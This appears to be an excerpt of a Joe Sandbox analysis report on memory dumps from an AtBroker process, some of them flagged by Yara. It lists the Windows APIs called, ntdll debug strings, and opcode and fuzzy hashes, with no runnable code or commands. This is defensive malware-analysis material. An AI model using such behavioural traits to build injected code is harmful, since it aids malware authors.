                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004D5812
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                                                    • Instruction ID: 528dc9a7c68416a1d77916ababcaaff3d62d0850bfe5383cb6bcf1aae8411686
                                                                    • Opcode Fuzzy Hash: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                                                    • Instruction Fuzzy Hash: F0011EB5D0020EBBDB10EAA5DC42F9EB3B89F54309F10419AE90897241FA35EB148B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNEL32(?,?,?,?,004D9093,00000010,?,?,?,00000044,?,00000010,004D9093,?,?,?), ref: 004E9023
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                    • Instruction ID: 2009e0a8e47dcb32c45ae6b1b495c40b9043e5f35ba42aa04854a56eb1b544a9
                                                                    • Opcode Fuzzy Hash: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                    • Instruction Fuzzy Hash: 3B01C4B2204208BBCB44DE89DC81EEB77ADAF8C714F118508BA09E3241D630F8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 004CAE25
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                                                    • Instruction ID: 77daea3710c3729c6d2b7986ca3c2a1adc48e03dba8b8411281fcb7592cda766
                                                                    • Opcode Fuzzy Hash: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                                                    • Instruction Fuzzy Hash: 39F0653739161436E63065EA9C02FDB778C9B91766F14052AF60CEB1C1D595B80242ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000104,004D46BC,004E21DC,004D46BC,?,004E21DC,004D46BC,00000104,004D46BC,0000C994), ref: 004E8F1F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                    • Instruction ID: 9dbc9eeced9d65f5afe5c2268ceafe7b2157f04d9203027ca14e17d026b7d25e
                                                                    • Opcode Fuzzy Hash: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                    • Instruction Fuzzy Hash: C5E0EDB56042047BD614EE59DC45FAB77ACEF89714F008419F918A7242D675B910C7B8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,035088C0,00000007,00000000,00000004,00000000,004D51E4,000000F0,?,?,?,?,?), ref: 004E8F6F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                                                    • Instruction ID: c2c59798291ca7c3f8f65fc18639dc07931179ce5302e0aa4788c9efe3a53e9d
                                                                    • Opcode Fuzzy Hash: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                                                    • Instruction Fuzzy Hash: F4E06DB62002047BD614EE5ADC41FAB33ACEFC5754F00440AF908A7242C631B8108AB8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00008003,?,?,004D308A,?,004E5A17,004E6523), ref: 004D8F13
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                                                    • Instruction ID: 7f851f430871fb873263c2af7f529c092bc31c785ba36bffd21997c360335b77
                                                                    • Opcode Fuzzy Hash: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                                                    • Instruction Fuzzy Hash: 84D05E722442047BFA40A7B68C0BF273A8C5B44759F04416DBA0CE73C3E999F401856A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(0000224E), ref: 004D90FC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                                                    • Instruction ID: 79e7553a453749cd6fad27549791c0e82629374777ea08adf4f9960fbfb18758
                                                                    • Opcode Fuzzy Hash: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                                                    • Instruction Fuzzy Hash: 44D0A73424D2611EE72146794C9D2BE37105F82360F184AD3E86CCF3E2D23AED5A8354
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                                    • Instruction ID: 7a02658c73526911a238a3ae0a462727ca3f91a2922d9b695a40169f58f391fc
                                                                    • Opcode Fuzzy Hash: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                                    • Instruction Fuzzy Hash: 66B09B719015C5DAFB11F760560C71779407BD0715F19C071E2030741E4738D1D1F175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 04562DF0: LdrInitializeThunk.NTDLL ref: 04562DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04560BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04560BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04560D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04560D74
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 8e061f45a3715d47de2e03bbf80d40224d8a39bbd5fee5d53cab56e438dae1c1
                                                                    • Instruction ID: 2d84a38f50649ec81158f605dad9bd153d8b35e46ebd7b9b2934b74832cbb2ec
                                                                    • Opcode Fuzzy Hash: 8e061f45a3715d47de2e03bbf80d40224d8a39bbd5fee5d53cab56e438dae1c1
                                                                    • Instruction Fuzzy Hash: B5423AB5A007159FDB20CF24C880BAAB7F5FF44714F1445AAE98A9B341E770BA85DF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: aaadff2c0567de10e58435721324679ed9006abd1e7d69f64a20e4ad77a70f30
                                                                    • Instruction ID: 49a33449125c65b05ab5943442fd9a01069795d5d21cc2d2e9896f31335efa02
                                                                    • Opcode Fuzzy Hash: aaadff2c0567de10e58435721324679ed9006abd1e7d69f64a20e4ad77a70f30
                                                                    • Instruction Fuzzy Hash: 6951C5B1B00256BFDF10EF98989097EF7F8BB48204B548569F45AD7641E234FE40EBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 7581efaf191d11d6fb0606b4c0804d9e2a76e17d0233dec448bb42bc4aaec91e
                                                                    • Instruction ID: 127a82819d3a075ec52e0915661b02885cac4aa1da8d87db210fdf740dd997de
                                                                    • Opcode Fuzzy Hash: 7581efaf191d11d6fb0606b4c0804d9e2a76e17d0233dec448bb42bc4aaec91e
                                                                    • Instruction Fuzzy Hash: 2C51E475A00646AFEB30DF5CD99097EB7F8BF44204F0488A9F895D7681E674FA00EB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04594742
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04594725
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04594787
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045946FC
                                                                    • ExecuteOptions, xrefs: 045946A0
                                                                    • Execute=1, xrefs: 04594713
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04594655
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: f626b244d40398695920702a422ca689b66b2fec7b61ea21ae0b99c3377c3757
                                                                    • Instruction ID: 901c1cc754f8ea33298bc6e4ef094613263edb43ac8682a0d37c331c9cb5e16f
                                                                    • Opcode Fuzzy Hash: f626b244d40398695920702a422ca689b66b2fec7b61ea21ae0b99c3377c3757
                                                                    • Instruction Fuzzy Hash: 22510935600219BBEF10ABA4EC95FBD77A8FF49304F04049AE905A71A0EB71BE45EF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction ID: 8d01d0fbe758dd80d6061d4031c9c05a0cd1ef0e2b6b208624451f760141587e
                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction Fuzzy Hash: F181D170E0526A9EDF24CE68D8917FEBBB2BF45310F18461AD863E7290D734B940EB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045902E7
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045902BD
                                                                    • RTL: Re-Waiting, xrefs: 0459031E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 385140a0e65392733bb279925aa86d6e2ca726e37bbd083d04c63029ad6e4df8
                                                                    • Instruction ID: fe3d60bcda445d0628cd2799ac86ac07b420f9a60f332de266e7ce4fad680400
                                                                    • Opcode Fuzzy Hash: 385140a0e65392733bb279925aa86d6e2ca726e37bbd083d04c63029ad6e4df8
                                                                    • Instruction Fuzzy Hash: 51E19E316047419FDB25CF28D884B2AB7E0BF88728F144A59F5A58B2E1E774F845EB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • RTL: Resource at %p, xrefs: 04597B8E
                                                                    • RTL: Re-Waiting, xrefs: 04597BAC
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04597B7F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 6a90c0f9a2060dbc86c8bb10720dd427366186fd59b67fbcc72149e7da568fad
                                                                    • Instruction ID: da15c5715876fc6785d0a1e6c7155b04a157461d517d3d7389161965990b5b53
                                                                    • Opcode Fuzzy Hash: 6a90c0f9a2060dbc86c8bb10720dd427366186fd59b67fbcc72149e7da568fad
                                                                    • Instruction Fuzzy Hash: 7741E1353007029FDB20DE25DC50B6AB7E5FF88714F100A2EF95A9B290EB71F805AB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0459728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04597294
                                                                    • RTL: Resource at %p, xrefs: 045972A3
                                                                    • RTL: Re-Waiting, xrefs: 045972C1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: 05e238ae427ae93bbc059daff1a26dc0353562f7617e313942ff93c7b3ae5d30
                                                                    • Instruction ID: 38406df1cbc9be793621a0124eb4e2b977c8abd27877c2b5435cb67fc6a1c477
                                                                    • Opcode Fuzzy Hash: 05e238ae427ae93bbc059daff1a26dc0353562f7617e313942ff93c7b3ae5d30
                                                                    • Instruction Fuzzy Hash: 0941F031710602EBDB24DE24DC41F6AB7E6FF88714F100A1AFD55AB240EB21F812ABD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: f80db41add8037b4a0d7884b5888411a31c275bdb40212e5e1bfbac379073f43
                                                                    • Instruction ID: 9f5d41e7b90861c7e5c80f1b213cdddcc0fc2fe74883228ab8b3d293ec9a7bc8
                                                                    • Opcode Fuzzy Hash: f80db41add8037b4a0d7884b5888411a31c275bdb40212e5e1bfbac379073f43
                                                                    • Instruction Fuzzy Hash: 26315272A102199FDB20DF2DDC50BEEB7F8FF44614F544596E849E3240EB30BA44ABA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction ID: 6fc50a4c5f4585c948d30ac43ab4ab7700cbfbeeb1837c3a3ba55b6c7f9da897
                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction Fuzzy Hash: 32918770E002169BDB24DE69D881ABEF7B5BF48728F14491EE857A72C4E734B940E750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: 06f2972b46d8258ee0b912d6fd6b7d64d6a418473ea25a6b43fb8704b8ef958c
                                                                    • Instruction ID: a6f110f9a51dcb8318ebf99cea6c6c7f509b832ee8e4b02c5a225bde0cf91b71
                                                                    • Opcode Fuzzy Hash: 06f2972b46d8258ee0b912d6fd6b7d64d6a418473ea25a6b43fb8704b8ef958c
                                                                    • Instruction Fuzzy Hash: F0812CB1E002699BDB31DB55CD44BEEB7B4BF49714F0041EAA919B7280E7306E84DFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%